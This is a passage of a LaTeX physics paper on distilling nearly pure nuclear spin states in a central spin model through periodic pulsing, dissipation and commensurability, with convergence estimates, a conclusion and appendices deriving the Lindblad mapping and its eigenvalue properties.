\label{sec:convergence}
In order to assess the speed of convergence of the initially disordered density
matrix $\rho_0=\mathbb{1}/Z$ to the limiting density matrix $V_0$ we
proceed as follows. Let us assume that the matrices $v_i$ are the eigen
matrices of $M$ and that they are normalized $||v_i||^2:=\text{Tr}(v_i^\dag v_i)=1$.
Since the mapping $M$ is not unitary, orthogonality of the eigenmatrices cannot
be assumed. Note that the standard normalization generically implies
that there is some factor between $V_0$ with $\text{Tr}(V_0)=1$ and $v_0$.
The initial density matrix $\rho_0$ can be expanded in the $\{v_i\}$
\begin{equation}
\rho_0 = \sum_{j=0}^{D-1} \alpha_j v_j.
\end{equation}
After $n$ pulses, the density matrix $\rho_n$ is given by
\begin{equation}
\rho_n = \sum_{j=0}^{D-1} \alpha_j \lambda_j^n v_j
\end{equation}
where $\lambda_j$ are the corresponding eigenvalues of $M$
and $\lambda_0=1$ by construction.
We aim at $\rho_0$ being close to $V_0$ within $p_\text{thresh}$, i.e.,
\begin{equation}
\label{eq:converged}
|| \rho_n -V_0 ||\le p_\text{thresh} ||V_0||
\end{equation}
should hold for an appropriate $n$. A generic value of the threshold
$p_\text{thresh}$ is $1\%$. To this end, the minimum $n$ which
fulfills \eqref{eq:converged} has to be estimated.
\begin{figure}[htb]
\centering
\includegraphics[width=0.60\columnwidth]{fig3}
\caption{Number of pulses for a convergence within $1\%$ ($p_\text{thresh}=0.0$)
are plotted for various bath sizes; couplings given by \eqref{eq:equidistant},
other parameters as in Fig.\ \ref{fig:overview}.
The corresponding residual entropies and magnetizations
are depicted in Fig.\ \ref{fig:size-mag}. The vertical dashed lines indicate
the estimates \eqref{eq:over-shift} for the entropy minima as before.}
\label{fig:number-N}
\end{figure}
Such an estimate can be obtained by determining
\begin{equation}
n_j := 1+\text{trunc}\left[\frac{\ln(|p_\text{thresh}\alpha_0/\alpha_j|)}{\ln(|\lambda_j|)}\right]
\end{equation}
for $j\in\{1, 2,3, \ldots,D-1 \}$. The estimate of the required number of
pulses is the maximum of these number, i.e.,
\begin{equation}
n_\text{puls} := \max_{1\le j < D} n_j.
\end{equation}
We checked exemplarily that the number determined in this way implies that
the convergence condition \eqref{eq:converged} is fulfilled.
This is not mathematically rigorous because it could be that there are very many
slowly decreasing contributions which add up to a significant deviation from
$V_0$. But generically, this is not the case.
In Fig.\ \ref{fig:number-N} the results are shown for various bath sizes
and the parameters for which the data of the previous figures was computed.
Since the entropy minima are located at the positions of the vertical dashed lines
to good accuracy one can read off the required number of pulses at the intersections
of the solid and the dashed lines. Clearly, about $2\cdot 10^{12}$ pulses are necessary
to approach the limiting, relatively pure density matrices $V_0$.
Interestingly, the number of required pulses does not depend
much on the bath size, at least for the accessible bath sizes.
This is a positive message in view of the scaling towards larger baths
in experimental setups.
\begin{figure}[htb]
\centering
\includegraphics[width=0.60\columnwidth]{fig4}
\caption{Number of pulses for a convergence within $1\%$ ($p_\text{thresh}=0.01$)
for $N=5$, $J_\text{max}=0.02J_\text{Q}$, and $z=10^{-3}$ for the exponential parametrization
in \eqref{eq:expo} (legend ``expo'') and the Gaussian parametrization
in \eqref{eq:gaus} (legend ``gaus'').
The corresponding residual entropies and magnetizations
are depicted in Figs.\ \ref{fig:expo} and \ref{fig:gaus}, respectively.
The vertical dashed lines indicate
the estimates for the entropy minima which are shifted from the
resonances without interactions according to \eqref{eq:over-shift}.}
\label{fig:parametrization}
\end{figure}
Figure \ref{fig:parametrization} depicts the required minimum number
of pulses for the two alternative parametrizations of the couplings
\eqref{eq:expo} and \eqref{eq:gaus}. Again, the range is about $3\cdot 10^{12}$.
Still, there are relevant differences. The value $n_\text{puls}$ is higher
for $\alpha=1$ ($\approx 4\cdot 10^{12}$) than for $\alpha=1/2$ ($\lessapprox 2\cdot 10^{12}$).
This indicates that the mechanism of distilling quantum states by
commensurability with periodic external pulses works best if the couplings \red{$J_i$
are similar, i.e., if their spread given by $J_\text{min}/J_\text{max}=\exp(-\alpha)$} is small. The same qualitative result is obtained for the residual entropy,
see Appendix \ref{app:other}.
Note that this argument also explains why the Gaussian parametrized couplings \eqref{eq:gaus}
require slightly less pulses than the exponential parametrized couplings \eqref{eq:expo}.
\red{The couplings $J_i$ cumulate at their maximum $J_\text{max}$ in the Gaussian case so that their
variance is slightly smaller than the one of the exponential parametrization.}
One could have thought that
the cumulated couplings $J_i \approx J_\text{max}$ in the Gaussian case
require longer pulsing in order to achieve a given degree of distillation
because mathematically equal couplings $J_i=J_{i'}$ imply degeneracies preventing
distillation, see the mathematical properties discussed in Sect.\ \ref{sec:math-proper}.
\red{But this appears not to be the case.}
\begin{figure}[htb]
\centering
\includegraphics[width=0.60\columnwidth]{fig5}
\caption{Residual entropies (panel a) and number of pulses
(panel b) for a convergence within $1\%$ ($p_\text{thresh}=0.0$)
for $N=3$, $J_\text{max}=0.1J_\text{Q}$, and $z=0.1$ for the equidistant parametrization
in \eqref{eq:equidistant} (legend ``equidist''), the exponential parametrization
in \eqref{eq:expo} (legend ``expo'') and the Gaussian parametrization
in \eqref{eq:gaus} (legend ``gaus'').
The vertical dashed lines indicate
the estimates for the entropy minima which are shifted from the
resonances without interactions according to \eqref{eq:over-shift}.}
\label{fig:faster}
\end{figure}
The total numbers of pulses is rather high. As many as $2\cdot 10^{12}$ pulses
for a repetition time ${T_\mathrm{rep}}\approx 10$ns imply about six hours of pulsing.
This can be achieved in the lab, but the risk that so far neglected decoherence
mechanisms spoil the process is real. If, however, the pulses can be applied more
frequently, for instance with ${T_\mathrm{rep}}=1$ns, the required duration shrinks to about 30
minutes. The question arises why so many pulses are required. While a comprehensive
study of this aspect is beyond the scope of the present article, first clue
can be given.
It suggests itself that the slow dynamics in the bath is responsible
for the large number of pulses required for convergence. This idea is corroborated
by the results displayed in Fig.\ \ref{fig:faster} where a larger
maximum coupling and, importantly, a larger $z$ factor is assumed.
Recall that the $z$-factor is the ratio of the Larmor frequency of the
bath spins to the Larmor frequency of the central spin. If it is increased,
here by a factor of 100, the bath spins precess much quicker.
Indeed, the range of the required number of pulses
is much lower with $2\cdot 10^7$ which is five orders of magnitude less
than for the previous parameters. The former six hours then become fractions
of seconds. Of course, the conventional $g$-factors of nuclear and electronic
spins do not allow for $z=0.1$. But the central spin model as such, built by a central spin
and a bath of spins supplemented by a damped excitation can also be
realized in a different physical system.
\red{Alternatively, optimized pulses can improve the efficiency of the
distillation by periodic driving. One may either consider modulated pulses
of finite duration \cite{pasin08a} or repeated cycles of several instantaneous
pulses applied at optimized time instants \cite{uhrig07,uhrig07err}
or combinations of both schemes \cite{uhrig10a}. Thus, further research
is called for. The focus, however, of the present work
is to establish the fundamental mechanism built upon periodic driving, dissipation
and commensurability.}
\section{Conclusion}
\label{sec:conclusion}
Previous work has established dynamic nuclear polarization (DNP), for a
review see Ref.\ \cite{maly08}. But it must be stressed that
the mechanism of this conventional DNP is fundamentally different from
the one described here. Conventionally, the polarization of an electron
is transferred to the nuclear spins, i.e., the polarization of
the electrons induces polarization of the nuclei in the \emph{same} direction.
In contrast, in the setup studied here, the electron is polarized
in $z$-direction while the nuclear spins are eventually polarized
perpendicularly in $x$-direction. Hence, the mechanism is fundamentally different:
it is NFF stemming essentially from commensurability. This is
also the distinguishing feature compared to standard optical pumping.
States in the initial mixture which do not allow for a time
evolution commensurate with the repetition time ${T_\mathrm{rep}}$ of the pulses are
gradually suppressed \red{while those whose time evolution is
commensurate are enhanced. This means that the weight of the former
in the density matrix is reduced upon periodic application of the pulses while
the weight of the latter is enhanced. Note that the trace of the
density matrix is conserved so that the suppression of the weight of some states
implies that the weight of other states is increased. The effect of the pulses
on other norms of the density matrix is not obvious since the dynamics is
not unitary, but dissipative.}
\red{For particular magnetic fields, there may be only one particular state allowing
for a dynamics commensurate with ${T_\mathrm{rep}}$. This case leads to the maximum
entropy reduction. Such a}
mechanism can be used also for completely different physical systems,
e.g., in ensembles of oscillators. The studied case of coupled spins
extends the experimental and theoretical observations of NFF for large spin baths
\cite{greil06a,greil07b,petro12,econo14,beuge16,jasch17,scher18,klein18} where
many values of the polarization of the Overhauser
field can lead to commensurate dynamics. Hence, only a partial reduction of entropy
occurred.
The above established DNP by NFF comprises the potential
for a novel experimental technique for state preparation: laser pulses instead
of microwave pulses as in standard NMR can be employed to prepare
coherent states which can be used for further processing, either to
perform certain quantum protocols or for analysis of the systems under study.
The combination of optical and radio frequency pulsing appears promising
because it enlarges the possibilities of experimental manipulations.
Another interesting perspective is to employ the concept of
state distillation by commensurability to physical systems other than
localized spins, for instance to spin waves in quantum magnets.
A first experimental observations of commensurability effects
for spin waves in ferromagnets are already carried out \cite{jackl17}.
\red{Studies on how to enhance the efficiency of the mechanism by
optimization of the shape and distribution of the pulses constitute
an interesting route for further research.}
In summary, we showed that dissipative dynamics of a highly excited
state is sufficient to modify the dynamics of energetically low-lying
spin degrees of freedom away from unitarity. The resulting dynamic map
acts like a contraction converging towards
a single density matrix upon iterated application. The crucial additional
ingredient is \emph{commensurability} \red{between the external
periodic driving and the internal dynamic processes, for instance Larmor precessions.
If commensurability is possible a substantial entropy reduction
can be induced}, almost to a single pure state.
This has been explicitly shown for an exemplary small
central spin model including electronic and nuclear Zeeman effect.
This model served as proof-of-principle model to establish the
mechanism of distillation by commensurability.
Such a model describes the electronic spin in quantum dots with
diluted nuclear spin bath or the spin of unpaired electrons in
molecules, hyperfine coupled to nuclear hydrogen spins.
We stress that the mechanism of commensurability can also be put to use in
other systems with periodic internal processes.
The fascinating potential to create and to manipulate
coherent quantum states by such approaches deserves further
investigation.
\section*{Acknowledgements}
The author thanks A.\ Greilich, J.\ Schnack,
and O.~P.\ Sushkov for useful discussions and the School of Physics of the
University of New South Wales for its hospitality.
\paragraph{Funding information}
This work was supported by the Deutsche Forschungsgemeinschaft (DFG)
and the Russian Foundation of Basic Research in TRR 160,
by the DFG in project no.\ UH 90-13/1, and by the Heinrich-Hertz Foundation
of Northrhine-Westfalia.
\begin{appendix}
\section{Derivation of the Linear Mapping}
\label{app:matrix}
The goal is to solve the time evolution of $\rho(t)$ from
just before a pulse until just before the next pulse.
Since the pulse leads to a unitary time evolution which
is linear
\begin{equation}
\rho(n{T_\mathrm{rep}}-)\to\rho(n{T_\mathrm{rep}}+)=U_\text{puls}\rho(n{T_\mathrm{rep}}-)U_\text{puls}^\dag
\end{equation}
with $U_\text{puls}$ from (5)
and the subsequent Lindblad dynamics defined by the
linear differential equation (6)
is linear
as well the total propagation in time is given by
a linear mapping $M: \rho(n{T_\mathrm{rep}}-) \rightarrow \rho((n+1){T_\mathrm{rep}}-)$.
This mapping is derived here
by an extension of the approach used in Ref.\ \cite{klein18}.
The total density matrix acts on the Hilbert space given by the direct product
of the Hilbert space of the
central spin comprising three states ($\ket{\uparrow},\ket{\downarrow}, \ket{\text{T}}$)
and the Hilbert space of the spin bath.
We focus on $\rho_\text{TT}:=\bra{\text{T}}\rho\ket{\text{T}}$
which is a $2^N\times2^N$ dimensional density matrix for the spin bath alone because the
central degree of freedom is traced out. By $\rho_\text{S}$
we denote the $d\times d$ dimensional
density matrix of the spin bath and the central spin, i.e., $d=2^{N+1}$ since
no trion is present: $\rho_\text{S}\ket{\text{T}}=0$. The number of entries
in the density matrix is $D=d^2$, i.e., the mapping we are looking for
can be represented by a $D\times D$ matrix.
The time interval ${T_\mathrm{rep}}$ between two consecutive pulses is sufficiently
long so that all excited trions have decayed before the next pulse arrives.
In numbers, this means $2\gamma{T_\mathrm{rep}}\gg 1$ and implies that
$\rho(n{T_\mathrm{rep}}-)=\rho_\text{S}(n{T_\mathrm{rep}}-)$ and hence inserting
the unitary of the pulse (5)
yields
\begin{subequations}
\label{eq:initial}
\begin{align}
\rho(n{T_\mathrm{rep}}+) &= U_\text{puls}\rho_\text{S}(n{T_\mathrm{rep}}-)U_\text{puls}^\dag
\\
\label{eq:initial-TT}
\rho_\text{TT}(n{T_\mathrm{rep}}+) &=\bra{\uparrow} \rho_\text{S}(n{T_\mathrm{rep}}-) \ket{\uparrow}
\\
\rho_\text{S}(n{T_\mathrm{rep}}+) &=\ket{\downarrow}\bra{\downarrow} \rho_\text{S}(n{T_\mathrm{rep}}-)
\ket{\downarrow}\bra{\downarrow} \ =\ S^-S^+ \rho_\text{S}(n{T_\mathrm{rep}}-) S^-S^+
\label{eq:initial-S}
\end{align}
\end{subequations}
where we used the standard ladder operators $S^\pm$ of the central spin to
express the projection $\ket{\downarrow}\bra{\downarrow}$.
The equations \eqref{eq:initial} set the initial values for the
subsequent Lindbladian dynamics which we derive next.
For completeness, we point out that there are also non-diagonal
contributions of the type $\bra{\text{T}}\rho\ket{\uparrow}$, but they
do not matter for $M$.
Inserting $\rho_\text{TT}$ into the Lindblad equation (6)
yields
\begin{equation}
\label{eq:TT}
\partial_t \rho_\text{TT}(t) = -i [H_\text{nZ},\rho_\text{TT}(t)] -2\gamma \rho_\text{TT}(t).
\end{equation}
No other parts contribute. The solution of \eqref{eq:TT} reads
\begin{equation}
\label{eq:TT_solution}
\rho_\text{TT}(t) = e^{-2\gamma t} e^{-iH_\text{nZ}t} \rho_\text{TT}(0+)
e^{iH_\text{nZ}t}.
\end{equation}
By the argument $0+$ we denote that the initial density matrix for
the Lindbladian dynamics is the one just after the pulse.
For $\rho_\text{S}$, the Lindblad equation (6)
implies
\begin{equation}
\partial_t \rho_\text{S}(t) = -i[H_\text{spin},\rho_\text{S}(t)]
+2\gamma \ket{\uparrow} \rho_\text{TT}(t) \bra{\uparrow}.
\end{equation}
Since we know the last term already from its solution in \eqref{eq:TT_solution}
we can treat it as given inhomogeneity in the otherwise homogeneous
differential equation. With the definition $U_\text{S}(t):= \exp(-iH_\text{spin}t)$
we can write
\begin{equation}
\partial_t \left(U_\text{S}^\dag(t) \rho_\text{S}(t) U_\text{S}(t)
\right) = 2\gamma U_\text{S}^\dag(t) \ket{\uparrow}\rho_\text{TT}(t)\bra{\uparrow}
U_\text{S}(t).
\end{equation}
Integration leads to the explicit solution
\begin{equation}
\rho_\text{S}(t) = U_\text{S}(t) \rho_\text{S}(0+) U_\text{S}^\dag(t)
+2\gamma\int_0^t U_\text{S}^\dag(t-t') \ket{\uparrow}\rho_\text{TT}(t')\bra{\uparrow}
U_\text{S}(t-t')dt'.
\label{eq:S_solut}
\end{equation}
If we insert \eqref{eq:TT_solution} into the above equation
we encounter the expression
\begin{equation}
\ket{\uparrow} \exp(-iH_\text{nZ} t) = \exp(-iH_\text{nZ} t)\ket{\uparrow}
\ =\ \exp(-izh I^x_\text{tot} t) \exp(izh S^x t) \ket{\uparrow}.
\end{equation}
where $I^x_\text{tot} :=S^x+\sum_{i=1}^NI^x_i$ is the total momentum in $x$-direction.
It is a conserved quantity commuting with $H_\text{spin}$ so that a joint
eigenbasis with eigenvalues $m_\alpha$ and $E_\alpha$ exists. We determine
such a basis $\{\ket{\alpha}\}$ by diagonalization in the
$d$-dimensional Hilbert space ($d=2^{N+1}$) of central spin and spin bath
and convert \eqref{eq:S_solut} in terms
of the matrix elements of the involved operators. For brevity, we write
$\rho_{\alpha\beta}$ for the matrix elements of $\rho_\text{S}$.
\begin{align}
\rho_{\alpha\beta}(t) &= e^{-i(E_\alpha-E_\beta)t}\Big\{\rho_{\alpha\beta}(0+)
\nonumber \\
&+2\gamma \int_0^t e^{i(E_\alpha-E_\beta-zh(m_\alpha-m_\beta))t'}
\bra{\alpha} e^{izhS^xt'}\ket{\uparrow} \rho_\text{TT}(0+)
\bra{\uparrow} e^{izhS^xt'}\ket{\beta}dt'\Big\}.
\label{eq:matrix1}
\end{align}
Elementary quantum mechanics tells us that
\begin{equation}
\label{eq:spin-precess}
e^{izhS^xt'}\ket{\uparrow} =
\frac{1}{2}e^{ia}(\ket{\uparrow}+\ket{\downarrow})
+ \frac{1}{2}e^{-ia}(\ket{\uparrow}-\ket{\downarrow})
\end{equation}
with $a:=zht'/2$ which we need for the last row of equation \eqref{eq:matrix1}.
Replacing $\rho_\text{TT}(0+)$ by
$\bra{\uparrow} \rho_\text{S}(n{T_\mathrm{rep}}-) \ket{\uparrow}$ according to \eqref{eq:initial-TT}
and inserting \eqref{eq:spin-precess} we obtain
\begin{subequations}
\begin{align}
\bra{\alpha} e^{izhS^xt'}\ket{\uparrow} \rho_\text{TT}(0+)
\bra{\uparrow} e^{izhS^xt'}\ket{\beta}
& =\bra{\alpha} e^{izhS^xt'}\ket{\uparrow} \bra{\uparrow} \rho_\text{S}(0-) \ket{\uparrow}
\bra{\uparrow} e^{izhS^xt'}\ket{\beta}
\\
& = \frac{1}{2} \left( R^{(0)} + e^{izht'} R^{(1)} + e^{-izht'} R^{(-1)}
\right)_{\alpha\beta}
\label{eq:spin2}
\end{align}
\end{subequations}
with the three $d\times d$ matrices
\begin{subequations}
\begin{align}
R^{(0)} &:= S^+S^- \rho_\text{S}(0-) S^+S^- + S^- \rho_\text{S}(0-) S^+
\\
R^{(1)} &:= \frac{1}{2}(S^++\mathbb{1}_d)S^- \rho_\text{S}(0-) S^+(S^--\mathbb{1}_d)
\\
R^{(-1)} &:= \frac{1}{2}(S^+-\mathbb{1}_d)S^- \rho_\text{S}(0-) S^+(S^-+\mathbb{1}_d).
\end{align}
\end{subequations}
In this derivation, we expressed ket-bra combinations
by the spin ladder operators according to
\begin{equation}
\ket{\uparrow} \bra{\uparrow} = S^+S^- \qquad
\ket{\uparrow} \bra{\downarrow} = S^+ \qquad
\ket{\downarrow} \bra{\uparrow} = S^-.
\end{equation}
The final step consists in inserting \eqref{eq:spin2} into \eqref{eq:matrix1}
and integrating the exponential time dependence straightforwardly from 0 to ${T_\mathrm{rep}}$.
Since we assume that $2\gamma{T_\mathrm{rep}}\gg1$ so that no trions are present once the next
pulse arrives the upper integration limit ${T_\mathrm{rep}}$ can safely and consistently be
replaced by $\infty$. This makes the expressions
\begin{equation}
G_{\alpha\beta}(\tau) := \frac{\gamma}{2\gamma-i[E_\alpha-E_\beta+zh(m_\beta-m_\alpha+\tau)]}
\end{equation}
appear where $\tau\in\{-1,0,1\}$. Finally,
we use \eqref{eq:initial-S} and summarize
\begin{equation}
\rho_{\alpha\beta}(t) = e^{-i(E_\alpha-E_\beta)t}
\Big\{
(S^-S^+ \rho_\text{S}(0-) S^-S^+ )_{\alpha\beta}
+\sum_{\tau=-1}^1 G_{\alpha\beta}(\tau) R^{(\tau)}_{\alpha\beta}
\Big\}.
\label{eq:complete}
\end{equation}
This provides the complete solution for the dynamics of $d\times d$ matrix
$\rho_\text{S}$
from just before a pulse ($t=0-$) till just before the next pulse for
which we set $t={T_\mathrm{rep}}$ in \eqref{eq:complete}.
In order to set up the linear mapping $M$ as $D\times D$ dimensional matrix
with $D=d^2$ we denote the matrix elements $M_{\mu'\mu}$ where $\mu$
is a combined index for the index pair $\alpha\beta$ and $\mu'$
for $\alpha'\beta'$ with
$\alpha,\beta,\alpha',\beta'\in\{1,2\ldots,d\}$.
For brevity, we introduce
\begin{equation}
P_{\alpha\beta} := [(S^++\mathbb{1}_d)S^-]_{\alpha\beta} \qquad
Q_{\alpha\beta} := [(S^+-\mathbb{1}_d)S^-]_{\alpha\beta}.
\end{equation}
Then, \eqref{eq:complete} implies
\begin{align}
M_{\mu'\mu} &= \frac{1}{2}e^{-i(E_{\alpha'}-E_{\beta'}){T_\mathrm{rep}}}\Big\{
2(S^-S^+)_{\alpha'\alpha} (S^-S^+)_{\beta\beta'}
\nonumber \\
&+2G_{\alpha'\beta'}(0)
\left[(S^+S^-)_{\alpha'\alpha} (S^+S^-)_{\beta\beta'}
+ S^-_{\alpha'\alpha} S^+_{\beta\beta'}\right]
\nonumber \\
&+\left[
G_{\alpha'\beta'}(1) P_{\alpha'\alpha} Q^*_{\beta'\beta}
+ G_{\alpha'\beta'}(-1) Q_{\alpha'\alpha} P^*_{\beta'\beta}
\right]\Big\}.
\label{eq:matrix2}
\end{align}
This concludes the explicit derivation of the matrix elements
of $M$. Note that they are relatively simple in the sense that no
sums over matrix indices are required on the right hand side of
\eqref{eq:matrix2}. This relative simplicity is achieved because
we chose to work in the eigenbasis of $H_\text{spin}$.
Other choices of basis are possible, but render the explicit
respresentation significantly more complicated.
\section{Properties of the Time Evolution}
\label{app:properties}
\paragraph{Preliminaries}
Here we state several mathematical properties of the mapping $M$ which
hold for any Lindblad dynamics over a given time interval which can
be iterated arbitrarily many times. We assume
that the underlying Hilbert space is $d$ dimensional so that $M$ acts
on the $D=d^2$ dimensional Hilbert space of
$d\times d$ matrices, i.e., $M$ can be seen as $D\times D$ matrix.
We denote the standard scalar product in the space of operators by
\begin{equation}
(A|B):=\text{Tr}(A^\dag B)
\end{equation}
where the trace refers to the $d\times d$ matrices $A$ and $B$.
Since no state of the physical system vanishes in its temporal evolution
$M$ conserves the trace of any density matrix
\begin{equation}
\text{Tr}(M\rho)=\text{Tr}(\rho).
\end{equation}
This implies that $M$ conserves the trace of \emph{any} operator $C$. This can be
seen by writing $C=(C+C^\dag)/2+ (C-C^\dag)/2=R+iG$ where $R$ and $G$ are
hermitian operators. They can be diagonalized and split into their positive and their
negative part $R=p_1-p_2$ and $G=p_3-p_4$. Hence, each $p_i$ is a density matrix
up to some real, positive scaling and we have
\begin{equation}
\label{eq:C-darst}
C = p_1-p_2+i(p_3-p_4).
\end{equation}
Then we conclude
\begin{subequations}
\begin{align}
\text{Tr}(MC) &= \text{Tr}(Mp_1)-\text{Tr}(Mp_2)+ i(\text{Tr}(Mp_3)-\text{Tr}(Mp_4))
\\
& = \text{Tr}(p_1)-\text{Tr}(p_2)+i(\text{Tr}(p_3)-\text{Tr}(p_4))
\ =\ \text{Tr}(C).
\end{align}
\end{subequations}
\paragraph{Property 1.}
The conservation of the trace for any $C$ implies
\begin{equation}
\label{eq:gen_trace_conserv}
\text{Tr}(C)=(\mathbb{1}_d|C)=(\mathbb{1}_d|MC)=(M^\dag\mathbb{1}_d|C)
\end{equation}
where $\mathbb{1}_d$ is the $d\times d$-dimensional identity matrix and $M^\dag$ is the
$D\times D$ hermitian conjugate of $M$. From \eqref{eq:gen_trace_conserv} we conclude
\begin{equation}
M^\dag \mathbb{1}_d = \mathbb{1}_d
\end{equation}
which means that $\mathbb{1}_d$ is an eigenoperator of $M^\dag$ with eigenvalue 1. Since the
characteristic polynomial of $M$ is the same as the one of $M^\dag$ up to complex conjugation
we immediately see that $1$ is also an eigenvalue of $M$.
If the dynamics of the system takes place in $n$ independent subspaces without
transitions between them, the $n$ different
traces over these subspaces are conserved separately
Such a separation occurs in case conserved symmetries
split the Hilbert space, for instance
the total spin is conserved in the dynamics given by
(6)
if all couplings are equal.
Then, the above argument implies the existence of $n$ different eigenoperators with
eigenvalue 1. Hence the degeneracy is (at least) $n$ which proves property
1. in the main text.
\paragraph{Properties 2. and 3.} As for property 2, we consider an eigenoperator $C$ of
$M$ with eigenvalue $\lambda\neq1$ so that $MC=\lambda C$. Then
\begin{equation}
\text{Tr}(C) = \text{Tr}(MC) \ = \ \lambda \text{Tr}(C)
\end{equation}
implies $\text{Tr}(C)=0$, i.e., tracelessness as stated.
Since all density matrices can be written as linear combinations of eigenoperators
there must be at least one eigenoperator with finite trace.
In view of property 2., this needs to be an
eigenoperator with eigenvalue 1 proving property 3.
The latter conclusion holds true if we assume that $M$ cannot be
diagonalized, but only has a Jordan normal form. If $d_\text{J}$ is the
dimension of the largest Jordan block, the density matrix $M^{d_\text{J}-1}\rho$
will be a linear combination of eigenoperators while still having the trace 1.
\paragraph{Property 4.} Next, we show that no eigenvalue $\lambda$ can be larger than 1 in absolute value.
The idea of the derivation is that the iterated application
of $M$ to the eigenoperator belonging to $|\lambda|>1$ would make
this term grow exponentially $\propto |\lambda|^n$
beyond any bound which cannot be true. The formal proof is a bit intricate.
First, we state that for any two density matrices $\rho$ and $\rho'$
their scalar product is non-negative $0\le (\rho|\rho')$ because it
can be viewed as expectation value of one of them with respect to the other
and both are positive operators. In addition, the Cauchy-Schwarz inequality
implies
\begin{equation}
\label{eq:rhorho}
0 \le (\rho|\rho') \le \sqrt{(\rho|\rho)(\rho'|\rho')}
\ =\ \sqrt{\text{Tr}(\rho^2)\text{Tr}((\rho')^2)} \ \le\ 1.
\end{equation}
Let $C$ be the eigenoperator of $M^\dag$ belonging to $\lambda$; it may be represented
as in \eqref{eq:C-darst} and scaled such that the maximum of the traces of the $p_i$ is
1. Without loss of generality this is the case for $p_1$, i.e., $\text{Tr}(p_1)=1$. Otherwise,
$C$ is simply rescaled: by $C\to-C$ to switch $p_2$ to $p_1$, by $C\to-iC$
to switch $p_3$ to $p_1$, or by $C\to iC$ to switch $p_4$ to $p_1$.
On the one hand, we have for any density matrix $\rho_n$
\begin{equation}
|(C|\rho_n)| \le |\Re(C|\rho_n)| + |\Im(C|\rho_n)| \le 2
\end{equation}
where the last inequality results form \eqref{eq:rhorho}.
On the other hand, we set $\rho_n:= M^np_1$ and obtain
\begin{subequations}
\begin{align}
2 &\ge |(C|\rho_n)|
= |((M^\dag)^nC|p_1)|
= |\lambda^*|^n |(C|p_1)|
=|\lambda|^n \sqrt{(\Re(C|p_1))^2+ (\Im(C|p_1))^2}
\\
&\ge |\lambda|^n|\Re(C|p_1)|
= |\lambda|^n(p_1|p_1)
\end{align}
\end{subequations}
where we used $(p_1|p_2)=0$ in the last step; this holds because
$p_1$ and $p_2$ result from the same diagonalization, but refer
to eigenspaces with eigenvalues of different sign.
In essence we derived
\begin{equation}
2 \ge |\lambda|^n(p_1|p_1)
\end{equation}
which clearly implies a contradiction for $n \to \infty$ because
the right hand side increases to infinity for $|\lambda|>1$.
Hence there cannot be eigenvalues with modulus larger than 1.
\paragraph{Property 5.} The matrix $M$ can be represented
with respect to a basis of the Krylov space spanned by the
operators
\begin{equation}
\label{eq:krylov}
\rho_n:=M^n\rho_0
\end{equation}
where $\rho_0$ is an arbitrary initial density matrix which should
contain contributions from all eigenspaces of $M$. For instance,
a Gram-Schmidt algorithm applied to the Krylov basis generates
an orthonormal basis $\tilde \rho_n$. Due to the fact, that all the
operators $\rho_n$ from \eqref{eq:krylov} are hermitian density matrices
$\tilde \rho_n = \tilde \rho_n^\dag$, we know that
all overlaps $(\rho_m|\rho_n)$ are real and hence the constructed
orthonormal basis $\tilde \rho_n$ consists of hermitian operators.
Also, all matrix elements
$(\rho_m|M\rho_n)=(\rho_m|\rho_{n+1})$ are real so that the resulting
representation $\tilde M$ is a matrix with real coefficients whence
\begin{subequations}
\begin{equation}
\tilde M c = \lambda c
\end{equation}
implies
\begin{equation}
\tilde M c^* = \lambda^* c^*
\end{equation}
\end{subequations}
by complex conjugation. Here $c$ is a vector of complex numbers $c_n$ which
define the corresponding eigenoperators by
\begin{equation}
\label{eq:cC}
C = \sum_{n=1}^D c_n \tilde \rho_n.
\end{equation}
Thus, $c$ and $c^*$ define $C$ and $C^\dag$, respectively.
\paragraph{Property 6.} In view of the real representation $\tilde M$ of $M$
with respect to an orthonormal basis of hermitian operators derived in the
previous paragraph the determination of the eigenoperators with eigenvalue
1 requires the computation of the kernel of $\tilde M-\mathbb{1}_D$. This is a linear algebra
problem in $\mathbb{R}^D$ with real solutions which correspond to
hermitian operators by means of \eqref{eq:cC}. This shows the stated
property 6..
\begin{figure}[hbt]
\centering
\includegraphics[width=0.49\columnwidth]{fig6a}
\includegraphics[width=0.49\columnwidth]{fig6b}
\includegraphics[width=0.49\columnwidth]{fig6c}
\caption{(a) Residual entropy as function of the applied
magnetic field for $N=3, J_\text{max}=0.02$, and $z=1/1000$ to show the position
at $h=2\pi/(z{T_\mathrm{rep}})$ and the shift, dashed line at $\approx 500J_\text{Q}J_\text{max}/(2z)$
of the nuclear magnetic resonance.
(b) Same as (a) for $z=1/500$. (c) Same as (a) for $z=1/250$.}
\label{fig:z-depend}
\end{figure}
\section{Shift of the Nuclear Resonance}
\label{app:shift}
\begin{figure}[hbt]
\centering
\includegraphics[width=0.5\columnwidth]{fig7}
\caption{Residual entropy as function of the applied
magnetic field for $N=3, z=1/1000$ and various values of $J_\text{max}$.
The shifts indicated by the dashed lines
correspond to the estimate \eqref{eq:nuclear-shift2}.
\label{fig:jm-depend}}
\end{figure}
In the main text, the shift of the nuclear resonance due to the
coupling of the nuclear spins to the central, electronic spin
was shown in the right panel of Fig.\
1(a). The effect can be estimated by
\begin{equation}
\label{eq:nuclear-shift2}
z\Delta h \approx \pm J_\text{max}/2.
\end{equation}
This relation is highly plausible, but it cannot be derived analytically
because no indication for a polarization of the central, electronic
spin in $x$-direction was found. Yet, the numerical data
corroborates the validity of \eqref{eq:nuclear-shift2}.
In Fig.\ \ref{fig:z-depend}, we show that the nuclear resonance
without shift occurs for
\begin{equation}
zh{T_\mathrm{rep}}=2\pi n'
\end{equation}
where $n'\in\mathbb{Z}$. But it is obvious that
an additional shift occurs which is indeed captured by
\eqref{eq:nuclear-shift2}.
In order to support \eqref{eq:nuclear-shift2} further, we also
study various values of $J_\text{max}$ in Fig.\ \ref{fig:jm-depend}.
The estimate \eqref{eq:nuclear-shift2} captures the main trend
of the data, but it is not completely quantitative because the
position of the dashed lines relative to the minimum of the
envelope of the resonances varies slightly for different values of $J_\text{max}$.
Hence, a more quantitative explanation is still called for.
\section{Entropy Reduction for Other Distributions of Couplings}
\label{app:other}
In the main text, we analyzed a uniform distribution of couplings, see
Eq.\ (8).
In order to underline that our results are generic and not linked to
a special distribution, we provide additional results for
two distributions which are often considered in literature, namely an
exponential parameterization as defined in \eqref{eq:expo}
and a Gaussian parametrization as defined in \eqref{eq:gaus}.
\begin{figure}[htb]
\centering
\includegraphics[width=0.49\columnwidth]{fig8a}
\includegraphics[width=0.48\columnwidth]{fig8b}
\caption{Residual entropy as function of the applied
magnetic field for various bath sizes $N$ for
the exponentially distributed couplings given by \eqref{eq:expo}; panel (a) for
